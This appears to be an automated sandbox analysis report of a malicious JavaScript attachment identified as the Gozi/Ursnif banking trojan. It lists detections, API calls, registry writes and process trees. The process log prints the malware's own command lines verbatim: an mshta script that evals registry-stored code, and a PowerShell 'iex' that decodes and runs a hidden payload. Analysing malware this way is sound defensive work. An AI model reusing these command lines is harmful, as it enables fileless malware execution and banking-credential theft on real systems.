Source: Yara match | File source: 00000003.00000003.974931290.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 3720, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5664, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4052, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 3_2_0514FB8F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 3_2_0514FB8F
Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.974215448.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1010236467.0000000004F5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974824363.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974371336.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974507500.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974637108.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1154798973.00000133741C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1156601270.0000000000C3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974737633.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974879691.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974931290.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 3720, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5664, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4052, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_051375B3 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_051375B3
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05135CD8 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 3_2_05135CD8
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0513476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_0513476B
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0513668C NtMapViewOfSection, 3_2_0513668C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0514CEA7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread, 3_2_0514CEA7
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05150170 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_05150170
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0514A395 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 3_2_0514A395
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_051493CD NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_051493CD
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05148A30 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_05148A30
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0514CA3E GetProcAddress,NtCreateSection,memset, 3_2_0514CA3E
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0514A27A NtQueryInformationProcess, 3_2_0514A27A
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_051402DF NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_051402DF
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05134D66 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_05134D66
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0514C7BD NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW, 3_2_0514C7BD
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05147933 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_05147933
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05144968 memset,memcpy,LdrInitializeThunk,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_05144968
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0513A99C NtGetContextThread,RtlNtStatusToDosError, 3_2_0513A99C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0514B07A NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_0514B07A
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_051473D6 memset,NtQueryInformationProcess, 3_2_051473D6
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05148A15 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_05148A15
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C071CC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 15_2_00C071CC
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C24AD0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 15_2_00C24AD0
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C08AD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification, 15_2_00C08AD8
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C19310 NtReadVirtualMemory, 15_2_00C19310
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C0ECE0 NtQueryInformationProcess, 15_2_00C0ECE0
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C24C24 NtAllocateVirtualMemory, 15_2_00C24C24
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C22DC0 NtQueryInformationProcess, 15_2_00C22DC0
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C065E8 NtMapViewOfSection, 15_2_00C065E8
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C105B8 NtWriteVirtualMemory, 15_2_00C105B8
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C04748 NtCreateSection, 15_2_00C04748
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C41004 NtProtectVirtualMemory,NtProtectVirtualMemory, 15_2_00C41004
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374124AD0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 18_2_0000013374124AD0
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374122DC0 NtQueryInformationProcess, 18_2_0000013374122DC0
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374141004 NtProtectVirtualMemory,NtProtectVirtualMemory, 18_2_0000013374141004
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_051393F0 CreateProcessAsUserA, 3_2_051393F0
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05156D18 3_2_05156D18
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05151D5A 3_2_05151D5A
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05151570 3_2_05151570
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05136F34 3_2_05136F34
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0513CF55 3_2_0513CF55
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05142778 3_2_05142778
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05143F8C 3_2_05143F8C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05152613 3_2_05152613
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05142EDE 3_2_05142EDE
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_051410DE 3_2_051410DE
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0513DB4A 3_2_0513DB4A
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C071CC 15_2_00C071CC
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C279AC 15_2_00C279AC
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C25550 15_2_00C25550
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C158F4 15_2_00C158F4
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C0C850 15_2_00C0C850
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C0682C 15_2_00C0682C
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C011A0 15_2_00C011A0
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C0D9B0 15_2_00C0D9B0
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2F944 15_2_00C2F944
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C0D178 15_2_00C0D178
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C08128 15_2_00C08128
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2DA94 15_2_00C2DA94
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C0A2B4 15_2_00C0A2B4
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C02AB5 15_2_00C02AB5
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2AA0C 15_2_00C2AA0C
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2F214 15_2_00C2F214
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C1F3CC 15_2_00C1F3CC
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2B3F0 15_2_00C2B3F0
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2DB90 15_2_00C2DB90
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C13B94 15_2_00C13B94
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C29358 15_2_00C29358
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C12318 15_2_00C12318
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C09B34 15_2_00C09B34
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C12C58 15_2_00C12C58
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C1BC5C 15_2_00C1BC5C
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C17C70 15_2_00C17C70
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C0B474 15_2_00C0B474
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C26C2C 15_2_00C26C2C
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2CD48 15_2_00C2CD48
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C10D08 15_2_00C10D08
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2A520 15_2_00C2A520
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2E520 15_2_00C2E520
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2BECC 15_2_00C2BECC
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C25EFC 15_2_00C25EFC
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C0FE88 15_2_00C0FE88
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C22EBC 15_2_00C22EBC
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C1CE40 15_2_00C1CE40
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C28E40 15_2_00C28E40
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C02644 15_2_00C02644
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2FE60 15_2_00C2FE60
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2DFC4 15_2_00C2DFC4
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C1FFF0 15_2_00C1FFF0
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C06F84 15_2_00C06F84
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C307B8 15_2_00C307B8
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C2873C 15_2_00C2873C
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000133741279AC 18_2_00000133741279AC
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374125550 18_2_0000013374125550
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374125EFC 18_2_0000013374125EFC
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412873C 18_2_000001337412873C
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374106F84 18_2_0000013374106F84
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412DFC4 18_2_000001337412DFC4
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000133741307B8 18_2_00000133741307B8
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337411FFF0 18_2_000001337411FFF0
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337410682C 18_2_000001337410682C
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337410C850 18_2_000001337410C850
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000133741158F4 18_2_00000133741158F4
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374108128 18_2_0000013374108128
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412F944 18_2_000001337412F944
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337410D178 18_2_000001337410D178
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337410D9B0 18_2_000001337410D9B0
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000133741011A0 18_2_00000133741011A0
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000133741071CC 18_2_00000133741071CC
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412AA0C 18_2_000001337412AA0C
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412F214 18_2_000001337412F214
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412DA94 18_2_000001337412DA94
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337410A2B4 18_2_000001337410A2B4
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374102AB5 18_2_0000013374102AB5
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374112318 18_2_0000013374112318
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374109B34 18_2_0000013374109B34
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374129358 18_2_0000013374129358
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412DB90 18_2_000001337412DB90
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374113B94 18_2_0000013374113B94
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337411F3CC 18_2_000001337411F3CC
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412B3F0 18_2_000001337412B3F0
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374126C2C 18_2_0000013374126C2C
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374117C70 18_2_0000013374117C70
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374112C58 18_2_0000013374112C58
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337411BC5C 18_2_000001337411BC5C
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337410B474 18_2_000001337410B474
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374110D08 18_2_0000013374110D08
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412E520 18_2_000001337412E520
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412A520 18_2_000001337412A520
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412CD48 18_2_000001337412CD48
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374102644 18_2_0000013374102644
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337411CE40 18_2_000001337411CE40
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374128E40 18_2_0000013374128E40
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412FE60 18_2_000001337412FE60
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337410FE88 18_2_000001337410FE88
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337412BECC 18_2_000001337412BECC
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_0000013374122EBC 18_2_0000013374122EBC
JavaScript / VBScript file with very long strings (likely obfuscated code)
Source: view_attach_b8x.js | Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Classification label
Source: classification engine | Classification label: mal100.phis.bank.troj.spyw.evad.winJS@21/18@11/1
Contains functionality to enumerate processes or threads
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05146887 CloseHandle,LdrInitializeThunk,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 3_2_05146887
Creates files inside the user directory
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Creates mutexes
Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{0FE5ED0C-228F-19C4-A4B3-765D18970AE1}
Source: C:\Windows\System32\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{C7D7CCCD-7A32-911F-BCEB-4E55B04F6259}
Source: C:\Windows\SysWOW64\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{63DD0252-66A3-8DE3-8847-FA113C6BCED5}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_01
Creates temporary files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\pJYlRpQA.LuPFL
Parts of this application use the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini files
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Runs a DLL by calling functions
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Sample is known by Antivirus
Source: view_attach_b8x.js | Virustotal: Detection: 25%
Source: view_attach_b8x.js | ReversingLabs: Detection: 21%
Sample might require command line arguments
Source: regsvr32.exe | String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Spawns processes
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_b8x.js'
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\iUBu.txt
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\iUBu.txt
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:17420 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:82958 /prefetch:2
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\iUBu.txt
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\iUBu.txt
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:17420 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:82958 /prefetch:2
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Reads Internet Explorer settings
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Submission file is bigger than most known malware samples
Source: view_attach_b8x.js | Static file information: File size 3550402 > 1048576
Uses new MSVCR DLLs
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000010.00000000.1133425764.0000000007010000.00000002.00000001.sdmp
Source: Binary string: c:\Ever\Knew\Experiment\poem\Base\Posepath.pdb | source: wscript.exe, 00000000.00000003.833057642.000001DFAC936000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb | source: regsvr32.exe, 00000003.00000003.1097720153.0000000005940000.00000004.00000001.sdmp
